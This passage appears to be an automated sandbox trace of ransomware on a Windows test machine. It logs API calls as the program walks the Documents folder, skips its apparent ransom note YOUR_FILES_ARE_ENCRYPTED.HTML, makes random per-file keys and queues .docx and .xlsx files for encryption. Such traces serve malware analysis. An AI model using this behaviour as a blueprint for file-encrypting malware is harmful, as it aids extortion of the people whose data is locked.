lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1068b8f0, ftCreationTime.dwHighDateTime=0x1d6cbc6, ftLastAccessTime.dwLowDateTime=0x4b7d4b0, ftLastAccessTime.dwHighDateTime=0x1d6da7a, ftLastWriteTime.dwLowDateTime=0x4b7d4b0, ftLastWriteTime.dwHighDateTime=0x1d6da7a, nFileSizeHigh=0x0, nFileSizeLow=0xdab0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="KGnuM6mr2xcP0kdd.docx", cAlternateFileName="KGNUM6~1.DOC")) returned 1 [0124.392] StrStrIW (lpFirst="KGnuM6mr2xcP0kdd.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.392] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx") returned 57 [0124.392] PathFindExtensionW (pszPath="KGnuM6mr2xcP0kdd.docx") returned=".docx" [0124.392] lstrlenW (lpString=".docx") returned 5 [0124.392] PathFindExtensionW (pszPath="KGnuM6mr2xcP0kdd.docx") returned=".docx" [0124.392] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\kgnum6mr2xcp0kdd.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.392] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=55984) returned 1 [0124.392] GetProcessHeap () returned 0x600000 [0124.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.393] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="AA") returned 2 [0124.393] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="32") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="B6") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="00") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="28") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="28") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="B7") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="89") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="27") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="A4") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="54") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="E5") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="6B") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="DA") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="6F") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D4") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="73") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="CB") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="02") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="6E") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="84") returned 2 [0124.393] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="5E") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="A4") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="08") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="EF") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="A5") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="D6") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="30") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="87") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="3B") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="EA") returned 2 [0124.394] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5D") returned 2 [0124.394] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KGnuM6mr2xcP0kdd.docx" [0124.394] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.394] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.399] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74c9bfe0, ftCreationTime.dwHighDateTime=0x1d6a431, ftLastAccessTime.dwLowDateTime=0x1214ec80, ftLastAccessTime.dwHighDateTime=0x1d6f9e0, ftLastWriteTime.dwLowDateTime=0x1214ec80, ftLastWriteTime.dwHighDateTime=0x1d6f9e0, nFileSizeHigh=0x0, nFileSizeLow=0xecd4, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="KzLy4AV867esTizNgj.docx", cAlternateFileName="KZLY4A~1.DOC")) returned 1 [0124.399] StrStrIW (lpFirst="KzLy4AV867esTizNgj.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.399] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx") returned 59 [0124.399] PathFindExtensionW (pszPath="KzLy4AV867esTizNgj.docx") returned=".docx" [0124.399] lstrlenW (lpString=".docx") returned 5 [0124.399] PathFindExtensionW (pszPath="KzLy4AV867esTizNgj.docx") returned=".docx" [0124.399] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\kzly4av867estizngj.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.400] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=60628) returned 1 [0124.400] GetProcessHeap () returned 0x600000 [0124.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.403] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="9B") returned 2 [0124.403] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C5") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="53") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7F") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="C4") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="18") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="30") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="2A") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C1") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="D1") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="91") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="27") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A3") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="76") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="BE") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="DD") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="37") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="8B") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="D7") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1C") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="00") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="66") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F3") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="F7") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="46") returned 2 [0124.403] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B1") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="7E") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C7") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="DD") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="0B") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="93") returned 2 [0124.404] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="44") returned 2 [0124.404] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\KzLy4AV867esTizNgj.docx" [0124.404] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.404] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.407] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508f6590, ftCreationTime.dwHighDateTime=0x1d7012d, ftLastAccessTime.dwLowDateTime=0x543bd110, ftLastAccessTime.dwHighDateTime=0x1d70475, ftLastWriteTime.dwLowDateTime=0x543bd110, ftLastWriteTime.dwHighDateTime=0x1d70475, nFileSizeHigh=0x0, nFileSizeLow=0x10b37, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="mteyX5r.xlsx", cAlternateFileName="MTEYX5~1.XLS")) returned 1 [0124.408] StrStrIW (lpFirst="mteyX5r.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.408] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx") returned 48 [0124.408] PathFindExtensionW (pszPath="mteyX5r.xlsx") returned=".xlsx" [0124.408] lstrlenW (lpString=".xlsx") returned 5 [0124.408] PathFindExtensionW (pszPath="mteyX5r.xlsx") returned=".xlsx" [0124.408] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\mteyx5r.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.408] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=68407) returned 1 [0124.408] GetProcessHeap () returned 0x600000 [0124.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.409] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="D1") returned 2 [0124.409] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="8B") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="E1") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="48") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="79") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="00") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="10") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A5") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="94") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="D3") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="B8") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="A6") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A9") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="02") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="43") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D8") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="4E") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="EC") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F2") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="14") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="76") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="9A") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="7E") returned 2 [0124.409] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="E9") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="02") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="51") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="4B") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="F8") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A6") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="0D") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="C7") returned 2 [0124.410] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="68") returned 2 [0124.410] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\mteyX5r.xlsx" [0124.410] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.410] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.413] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead45a90, ftCreationTime.dwHighDateTime=0x1d7075c, ftLastAccessTime.dwLowDateTime=0x40a8e140, ftLastAccessTime.dwHighDateTime=0x1d70a2b, ftLastWriteTime.dwLowDateTime=0x40a8e140, ftLastWriteTime.dwHighDateTime=0x1d70a2b, nFileSizeHigh=0x0, nFileSizeLow=0xde3b, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="MTUhB4BoPv_s.xlsx", cAlternateFileName="MTUHB4~1.XLS")) returned 1 [0124.413] StrStrIW (lpFirst="MTUhB4BoPv_s.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.414] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx") returned 53 [0124.414] PathFindExtensionW (pszPath="MTUhB4BoPv_s.xlsx") returned=".xlsx" [0124.414] lstrlenW (lpString=".xlsx") returned 5 [0124.414] PathFindExtensionW (pszPath="MTUhB4BoPv_s.xlsx") returned=".xlsx" [0124.414] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\mtuhb4bopv_s.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.414] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=56891) returned 1 [0124.414] GetProcessHeap () returned 0x600000 [0124.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.415] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="35") returned 2 [0124.415] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="07") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="04") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F9") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="FE") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C0") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="6F") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="52") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="AA") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="F7") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="FB") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="CD") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="C9") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B9") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="7A") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="4E") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="62") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="8D") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B7") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="CC") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="54") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="81") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="73") returned 2 [0124.415] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="89") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="EA") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="2F") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="AE") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="36") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="B0") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="67") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="67") returned 2 [0124.416] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5F") returned 2 [0124.416] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx" [0124.416] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.416] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.420] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0124.420] StrStrIW (lpFirst="My Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.420] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music") returned 44 [0124.420] GetProcessHeap () returned 0x600000 [0124.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.421] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music" [0124.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*" [0124.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Music\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x1f96b8f8, ftCreationTime.dwLowDateTime=0x1b809900, ftCreationTime.dwHighDateTime=0x535824, ftLastAccessTime.dwLowDateTime=0x2bfbc620, ftLastAccessTime.dwHighDateTime=0x87631840, ftLastWriteTime.dwLowDateTime=0x39678ee0, ftLastWriteTime.dwHighDateTime=0x19ecd8, nFileSizeHigh=0x8d3187, nFileSizeLow=0x19ed9c, dwReserved0=0x19ec60, dwReserved1=0x32b3d2b, cFileName="", cAlternateFileName="翿")) returned 0xffffffff [0124.421] GetProcessHeap () returned 0x600000 [0124.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.421] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0124.421] StrStrIW (lpFirst="My Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.421] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures") returned 47 [0124.421] GetProcessHeap () returned 0x600000 [0124.421] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.421] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures" [0124.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*" [0124.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\My Pictures\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x1f96b8f8, ftCreationTime.dwLowDateTime=0x1b809900, ftCreationTime.dwHighDateTime=0x535824, ftLastAccessTime.dwLowDateTime=0x2bfbc620, ftLastAccessTime.dwHighDateTime=0x87631840, ftLastWriteTime.dwLowDateTime=0x39678ee0, ftLastWriteTime.dwHighDateTime=0x19ecd8, nFileSizeHigh=0x8d3187, nFileSizeLow=0x19ed9c, dwReserved0=0x19ec60, dwReserved1=0x32b3d2b, cFileName="", cAlternateFileName="翿")) returned 0xffffffff [0124.421] GetProcessHeap () returned 0x600000 [0124.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.421] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="My Videos", 